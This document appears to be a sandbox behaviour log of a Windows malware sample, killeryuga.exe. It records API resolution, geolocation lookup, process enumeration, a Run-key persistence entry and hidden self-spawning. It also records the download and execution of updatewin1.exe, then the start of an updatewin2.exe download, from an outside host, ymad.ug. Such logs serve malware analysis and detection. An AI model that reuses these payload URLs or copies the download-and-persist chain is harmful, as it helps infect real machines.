Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x74f58a29 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x74f59a55 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x74f578e2 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x74f57136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x74d67144 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x75220000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x75223eae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x75223ed5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x75225dee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x75224af8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x75223e59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x75223f21 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x75224642 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x7522fd6b True 1
Fn
Module Load module_name = IPHLPAPI.DLL, base_address = 0x74b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x74b59263 True 1
Fn
Module Load module_name = WS2_32.dll, base_address = 0x75bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x75bc311b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x75bd7673 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x75bcb131 True 1
Fn
Module Load module_name = DNSAPI.dll, base_address = 0x74a80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x74a8436b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x74a9572c True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:32 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 17649686175 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Inet Read Response size = 10240, size_out = 554 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Module Load module_name = Psapi.dll, base_address = 0x75140000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Process Enumerate Processes - True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 1024 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
COM Create interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:33 (UTC) True 1
Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
Service Open database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, os_pid = 0x9d0, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Mutex Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, os_pid = 0x9d8, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window Create window_name = LPCWSTRszTitle, class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
Thread 0x9c8
111 138
Category Operation Information Success Count Logfile
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathA, address_out = 0x760e7804 True 1
Fn
File Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin1.exe True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin1.exe True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 2560 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 2560 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, show_window = SW_SHOWNORMAL True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin2.exe True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin2.exe True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Inet Read Response size = 10240, size_out = 10240 True 1
